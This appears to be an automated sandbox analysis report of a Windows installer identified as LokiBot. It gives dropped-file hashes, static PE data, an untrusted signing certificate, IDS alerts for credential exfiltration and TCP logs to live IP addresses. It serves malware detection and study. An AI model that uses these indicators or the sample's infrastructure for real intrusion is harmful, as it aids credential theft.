
              Download File
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:SVG Scalable Vector Graphics image
              Category:dropped
              Size (bytes):266
              Entropy (8bit):4.986245244009802
              Encrypted:false
              SSDEEP:6:tI9mc4slzc8SRIKMNo/aMhFl1OkUjq5eKVrGDVfqKlNK+:t4C8LKMuyMhPobjoprGDRlj
              MD5:8B727826F9D8C0C7C954EDE912CB0DEB
              SHA1:1518AA80747326B5353C22D32E57A33D61285119
              SHA-256:0783A7F518D3879C8F0F50B45FBD779A98652469E9B7C659CE41F14D1629D334
              SHA-512:0ABB243F9D1E0B6EDA0CB25D35C3449AB2B5B83078208F11B876A27FF11FF70B79F8BA97D4DA3AED21A8314C75FB2174D9378AF59B57DCB99DFF681D9AAB8561
              Malicious:false
              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">. <path d="M8 1a3 3 0 100 6 3 3 0 000-6zM6.5 8A4.49 4.49 0 002 12.5V14c0 1 1 1 1 1h10s1 0 1-1v-1.5A4.49 4.49 0 009.5 8z" style="marker:none" color="#bebebe" overflow="visible" fill="#2e3436"/>.</svg>.

              C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Tilrettelggelsernes\Gyrite\be.txt

              Download File
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
              Category:dropped
              Size (bytes):12193
              Entropy (8bit):4.4720152705808935
              Encrypted:false
              SSDEEP:192:i2PDEeaNB1PmcptkcDHxbTvPnc67bMxQxGx4ch/JuLQRcg/oN96bPNljYiYr197:ikDFKBFmcPLx3HPnIsqrJuqcgAN96b87
              MD5:3C21135144AC7452E7DB66F0214F9D68
              SHA1:B1EC0589D769EAB5E4E8F0F8C21B157EF5EBB47D
              SHA-256:D095879B8BBC67A1C9875C5E9896942BACF730BD76155C06105544408068C59E
              SHA-512:0446A0E2570A1F360FD8700FD4C869C7E2DBB9476BBDEC2526A53844074C79691542B91455343C50941B8A6D5E02A58EE6AA539CC4C4AE9CF000B4034EF663E2
              Malicious:false
              Preview:.;!@Lang2@!UTF-8!..; : Kirill Gulyakevitch..; 9.07 : 2011-03-15 : Drive DRKA..;..;..;..;..;..;..;..;..;..0..7-Zip..Belarusian..............401..OK................&.....&....&......................&............440..... ... &........ ... .&.......................&.......&.. ....... ......&......... ......... ........ ....... .......... ........?..500..&......&........&........&..........&.......&.........540..&................ &................... .&................&................&.........&......... ......&........... ......&............&..... ..........&.'...... .............&...........&................. ......Diff..&........ .

              C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Tilrettelggelsernes\Gyrite\changes-allow-symbolic.svg

              Download File
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:SVG Scalable Vector Graphics image
              Category:dropped
              Size (bytes):998
              Entropy (8bit):5.186938379246791
              Encrypted:false
              SSDEEP:24:t4CBGD0QNRWLLxo2em0yKbRAecFxV0/wXK:gDrc0NtAecFiH
              MD5:CB1EEE7BDB582B756D0F68EF02D6D96D
              SHA1:9E9B0F25BC472EF1C1C13EEAC12FD11C4CC0D2D9
              SHA-256:20EA767E852A8EBF2C5BA16D56CBAE10BD09D6CBA89B372A57EAA973AD3281B4
              SHA-512:E22FAEAE78D244A0F4E7215B31125D5AA4FD66C0720B0DE61D12084EAB879D7A9E231CCD5CD431417115B0945B450DC348DA400D67DB1898513B7BD6B9C274DB
              Malicious:false
              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#bebebe" fill="#474747"><path d="M3 9h10c.554 0 1 .446 1 1v3c0 .554-.446 1-1 1H3c-.554 0-1-.446-1-1v-3c0-.554.446-1 1-1z" style="marker:none" overflow="visible"/><path d="M7 0s-.709-.014-1.447.356C4.814.725 4 1.666 4 3v3h2V3c0-.667.186-.725.447-.855C6.71 2.014 7 2 7 2h2s.291.014.553.145c.261.13.447.188.447.855v8h2V3c0-1.333-.814-2.275-1.553-2.644C9.71-.014 9 0 9 0z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal;marker:none" font-weight="400" font-family="sans-serif" overflow="visible"/><path d="M2 12h12v4H2z" style="marker:none" overflow="visible"/></g></svg>

              C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Tilrettelggelsernes\Gyrite\dotnet.api

              Download File
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:HTML document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1245
              Entropy (8bit):5.462849750105637
              Encrypted:false
              SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
              MD5:5343C1A8B203C162A3BF3870D9F50FD4
              SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
              SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
              SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
              Malicious:false
              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co

              C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Tilrettelggelsernes\Gyrite\ebook-reader.png

              Download File
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):555
              Entropy (8bit):7.499536740374189
              Encrypted:false
              SSDEEP:12:6v/7anZhFxDEKwjAq0kaO/yvSL6T1pjNngLpzPanwmB9HE4JqSjF:5bDEPxdqKLmpqLdynw29kEqSZ
              MD5:BFF011148B773FA44B9A9BB029E8CC52
              SHA1:F2B838927E320D12649CEFDEA3AFE383C6650D7C
              SHA-256:B21DE7B432A7A67544D007ECC0FDD95F8E8C6129AF558A32102EE04C08635653
              SHA-512:A57C83AEE0E1F4C530D2F5B90589C31FD6E2FF8F62F998963284218FAC5EE164BCA7A619A9597DC3E2ECD0095A2CF04467E89EDF86700E1A90B3DF60B5121C9B
              Malicious:false
              Preview:.PNG........IHDR................a....IDATx......A....v...b.m.A..Q..Q..UD5.F.m.....fs{9.}...V.`....%.kt....R...+%7.}p..@.}:..u466`.6uu.tvv...N6....D"Q......po".;.4....W..g.b..\.~?...<.../.....$..5....................r.+..ah...F;.H.`b ....4.[...k.6.<..Kk.m[h..x`...R...z{.H.......Oax.e..{.........w._...c._>..6..T*HY.1! e.#....G......{.AB..l.K"..P(..j..$.R.}L.5.....@.>.......X...hE....L.."L.....=~..7n.2.,RJ.01.....B.AWW..<q......Ng.,../.Z...+...N].r.5.EB.p$..!,....,......SW.TD+U...K...ee._.N*.[..`..1q..v\#6..?;7..4..3....IEND.B`.

              C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Tilrettelggelsernes\Gyrite\emblem-photos-symbolic.svg

              Download File
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:SVG Scalable Vector Graphics image
              Category:dropped
              Size (bytes):680
              Entropy (8bit):5.109191824773878
              Encrypted:false
              SSDEEP:12:t4CP5GEA9xI7jhz4AeW02KdTwWjhz4AeW02KdTPqkoop4p:t4CBGEAgF4AeW0/N4AeW0/Zqg4p
              MD5:379690952AAA576521D51249D404CBCD
              SHA1:61A8A95B0454422AA47379CF983B99FFDD839439
              SHA-256:EAD402FB0B85DB153356EC695016FD4F2C4031367D8ED6D1C1EF5FF4F28A8DE8
              SHA-512:35B6BC866C3D02A2486D3447C82405103DE89D46940F7FE44A7009E714BBA57FBE601EEC939C3206ADB06FB31C4FD1D3822A0ED52A346ACFDE5908643432F928
              Malicious:false
              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" fill="#474747"><path d="M13 5v2h1v5H4v2h12V5z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-weight="400" font-family="Sans" overflow="visible"/><path d="M0 2v9h12V2zm2 2h8v5H2z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-weight="400" font-family="Sans" overflow="visible"/><path d="M3 7c2.32 1 3.045-1.66 6 0v1H3z" style="marker:none" overflow="visible" opacity=".35"/></g></svg>

              C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Tilrettelggelsernes\Gyrite\font-select-symbolic.symbolic.png

              Download File
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):220
              Entropy (8bit):6.546211943247282
              Encrypted:false
              SSDEEP:6:6v/lhPysde0C1jngP3V95D2tOA/RDvhpLUxbVp:6v/7jC1zi3Sr/hW
              MD5:C84EE7522C124892455BB09DEBCF9340
              SHA1:AF87A2A5688346A3902762DD250328B7EF224620
              SHA-256:E0A3BD6FE1A1BAEFFE04BCA2980ADF755F888E31DCE3686B16C5DAC4202A38C8
              SHA-512:3BEED79366F15CD075781F677C0C9E84081D2189D1FB541A34AA25980B48701A3D93DC550E4ABEB550EFBE3167B1CAB8338E22F4603C6A71936876FBA75FAD58
              Malicious:false
              Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...=..P.../z.Q..Kx....l.b. )...x........t.......Y~.)......7......W.xk.'A...u.........%..!k.k5.|E=+X..,,a.S.H4p*D8.8(FH.a..5.x...%.....7..8s:.......IEND.B`.

              C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Tilrettelggelsernes\Gyrite\network-wired-symbolic.symbolic.png

              Download File
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):144
              Entropy (8bit):5.708279548998072
              Encrypted:false
              SSDEEP:3:yionv//thPl9vt3lAnsrtxBllAoSF1/LvgStjP9f9uvJYUo+/JHt//sup:6v/lhPysKo21/Lvlt7V9+YUouJH1/jp
              MD5:1ED278AD206D6EA33FF787DD326E0FC5
              SHA1:8CFF7AD12FC0E5545E71D05879A0245BEDAF4D46
              SHA-256:CC88E76F7C7D2E5B07E49D1F2AD88F8BAFC0542EB11CEB2B2FFF235C87AB4417
              SHA-512:7291085B6153C02EDBF679CDDB93B97DBB74943F216EB622CE9722E02613269F626F8A7A5BE8DA683153E9AEE22C40ED7264E8A0ED62A99F477E2B96642596BF
              Malicious:false
              Preview:.PNG........IHDR................a....sBIT....|.d....GIDAT8.c`..0...O.Z&J]0.. ...&u]..5?......b....Q.E./.....t@..,....)1..,b...#.=....IEND.B`.

              C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Unrivalled\Nonexhaustively\Snaffle\Stealthful\LogoCanary.png

              Download File
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):16669
              Entropy (8bit):7.836876926418697
              Encrypted:false
              SSDEEP:384:dg1Ew+1FT+/6trrKWzge5jh2xmalhctpNy:W1E1c6tru1CUYa4tDy
              MD5:F80867A421C85C6E2865CF85FF7C4B02
              SHA1:C3EAB6B7E92646FE3407B2B3C5AFFE13A7873C48
              SHA-256:BCAA3B1333919176137D4DE4B1E3F31126159B12F959D7277BD8537B95139BD3
              SHA-512:06B51E660AEE86FC3BB068C6DEA046920E04F86B8EDD02E640EAC619F0F0D7E87E5CAE5BE1390CEBC5DFE70AA13BAB1710176E88C9D1C859182629D429745D78
              Malicious:false
              Preview:.PNG........IHDR...X...X......f......tEXtSoftware.Adobe ImageReadyq.e<..@.IDATx.....\.}..../...].{`.......D.\..u......#..V.eW.G>"W....V..d..IVU".:.D<$J.....{q/.....`0g./..z....A.`..?..p....M......._.'...L...]~.....;.........,..... ....X.....@`.. ..........@`...,..... ....X.....@`.. ..........@`...,..........X.....@`.. ..........@`...,..........X......... ..........@`...,..........X......... ..........@`...,..........X......... ..........@`...,..........X......... ..........@`...,..........X......... ..........@`...,..........X...,..... ..........@`...,..........X...,..... ....~.....N...@...C{..o.?2.....x...?_....sC..O8...n..J.ttbv9...w~...ym..O.......vq"f..qrjt9... ..].S..Hz.gf}.,.Sm!...>..Xh..:S.};d.....2..?.......2...1..ep...K.{.?..@`.7=...7U..C......S...6....|a.}].._..d....,_.........+__..JS.....X.u...;..Q.x.z9...eP5f.H..nnz.&h...4.kz......&....o)..=..x.=...y ....6i...wL.....Y(.2NRP..J...HL/K#^izqpbUp}...q...g.......".....4R..#.VFrR|.LF>w~.Pm..\..4.5t{.-..

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.56953186638099
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:o6OaOfrAQs.exe
              File size:335976
              MD5:049ecad4587538c292e3ebeee5947eb5
              SHA1:12aabeb19083dd114b7b94c836b031de3945d2c9
              SHA256:cf9a08d65a0b472b1ed84638a09d39d741f34e9cd2641092141a9bf1a5f796a6
              SHA512:12092128f6b2f6ea6ab86a7b1812e550e598dfecd43a240bd1ffc0bd15ff9c24e3c9bb40a4273ad706b9a7a7ad890b1c708c42cc23ec359626f5024b36db03ce
              SSDEEP:6144:DDk9dhfzelxllPuHBXZOEz5hN4EAnKQo4N7kqZ7t+roIbvS:U9u3lWHBXZTENnKza7kqZ5+rh6
              TLSH:7D6401913AE0D467FC5A4630CAA5E5F3D2A1FE04C916C18373647F6F7D322419922EBA
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...+.oZ.................`.........

              File Icon

              Icon Hash:08c2b0d8cc64b046

              Static PE Info

              General

              Entrypoint:0x4031d6
              Entrypoint Section:.text
              Digitally signed:true
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x5A6FED2B [Tue Jan 30 03:57:31 2018 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:3abe302b6d9a1256e6a915429af4ffd2

              Authenticode Signature

              Signature Valid:false
              Signature Issuer:E=Brooking183@Flydes25.Dyr, OU="Magtbalancerne Regnvejrsdagene Intensives ", O=Skizofren, L=Onalaska, S=Wisconsin, C=US
              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
              Error Number:-2146762487
              Not Before, Not After
              • 05/02/2023 08:25:21 04/02/2026 08:25:21
              Subject Chain
              • E=Brooking183@Flydes25.Dyr, OU="Magtbalancerne Regnvejrsdagene Intensives ", O=Skizofren, L=Onalaska, S=Wisconsin, C=US
              Version:3
              Thumbprint MD5:DE53E25C4A808A06A0CD944E65FB058D
              Thumbprint SHA-1:B1DD19494EAA53E29C92E68EB19E33CFABB34DE0
              Thumbprint SHA-256:12FF0462FE369CB81BB77B13ADFE3B705E7F71A5CFA614B370A8D6D63719C06F
              Serial:6CA44E753450CEC7C37D62FEA0B835456441D271

              Entrypoint Preview

              Instruction
              sub esp, 00000184h
              push ebx
              push esi
              push edi
              xor ebx, ebx
              push 00008001h
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 00409198h
              mov dword ptr [esp+20h], ebx
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [004070A0h]
              call dword ptr [0040709Ch]
              and eax, BFFFFFFFh
              cmp ax, 00000006h
              mov dword ptr [0042370Ch], eax
              je 00007F2D696B3433h
              push ebx
              call 00007F2D696B650Ah
              cmp eax, ebx
              je 00007F2D696B3429h
              push 00000C00h
              call eax
              mov esi, 00407298h
              push esi
              call 00007F2D696B6486h
              push esi
              call dword ptr [00407098h]
              lea esi, dword ptr [esi+eax+01h]
              cmp byte ptr [esi], bl
              jne 00007F2D696B340Dh
              push 0000000Ah
              call 00007F2D696B64DEh
              push 00000008h
              call 00007F2D696B64D7h
              push 00000006h
              mov dword ptr [00423704h], eax
              call 00007F2D696B64CBh
              cmp eax, ebx
              je 00007F2D696B3431h
              push 0000001Eh
              call eax
              test eax, eax
              je 00007F2D696B3429h
              or byte ptr [0042370Fh], 00000040h
              push ebp
              call dword ptr [00407044h]
              push ebx
              call dword ptr [00407288h]
              mov dword ptr [004237D8h], eax
              push ebx
              lea eax, dword ptr [esp+38h]
              push 00000160h
              push eax
              push ebx
              push 0041ECC8h
              call dword ptr [00407178h]
              push 00409188h

              Rich Headers

              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x360000xa3c0.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x516500xa18
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x5f0d0x6000False0.6649169921875data6.450520423955375IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x70000x12480x1400False0.4275390625data5.007650149182371IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x90000x1a8180x400False0.6376953125data5.129587811765307IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .ndata0x240000x120000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x360000xa3c00xa400False0.0760766006097561data1.8822021165260459IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              RT_BITMAP0x362680x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States
              RT_ICON0x365d00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 0EnglishUnited States
              RT_DIALOG0x3fa780x144dataEnglishUnited States
              RT_DIALOG0x3fbc00x13cdataEnglishUnited States
              RT_DIALOG0x3fd000x120dataEnglishUnited States
              RT_DIALOG0x3fe200x11cdataEnglishUnited States
              RT_DIALOG0x3ff400xc4dataEnglishUnited States
              RT_DIALOG0x400080x60dataEnglishUnited States
              RT_GROUP_ICON0x400680x14dataEnglishUnited States
              RT_MANIFEST0x400800x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

              Imports

              DLLImport
              KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
              USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
              SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
              ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              192.168.11.20185.246.220.8549818802025381 03/17/23-20:49:57.296824TCP2025381ET TROJAN LokiBot Checkin4981880192.168.11.20185.246.220.85
              192.168.11.20185.246.220.8549818802024317 03/17/23-20:49:57.296824TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24981880192.168.11.20185.246.220.85
              192.168.11.20185.246.220.8549818802825766 03/17/23-20:49:57.296824TCP2825766ETPRO TROJAN LokiBot Checkin M24981880192.168.11.20185.246.220.85
              192.168.11.20185.246.220.8549818802024312 03/17/23-20:49:57.296824TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14981880192.168.11.20185.246.220.85
              192.168.11.20185.246.220.8549818802021641 03/17/23-20:49:57.296824TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.11.20185.246.220.85

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Mar 17, 2023 20:49:56.242620945 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.284706116 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.284915924 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.285419941 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.327553988 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.327625036 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.327786922 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.328250885 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.328422070 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.328454018 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.328489065 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.328602076 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.328623056 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.328660011 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.328690052 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.328716993 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.328803062 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.328804016 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.328862906 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.329441071 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.329514027 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.329803944 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.329803944 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.369924068 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.370007992 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.370086908 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.370193005 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.370542049 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.370640993 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.370733976 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.370758057 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.370791912 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.370829105 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.370870113 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.370910883 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.370928049 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.370948076 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.371073961 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.371103048 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.371146917 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.371244907 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.371280909 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.371299028 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.371427059 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.371484041 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.371480942 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.371597052 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.371630907 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.371731043 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.371805906 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.371875048 CET4981780192.168.11.2085.95.248.49
              Mar 17, 2023 20:49:56.371882915 CET804981785.95.248.49192.168.11.20
              Mar 17, 2023 20:49:56.371941090 CET804981785.95.248.49192.168.11.20
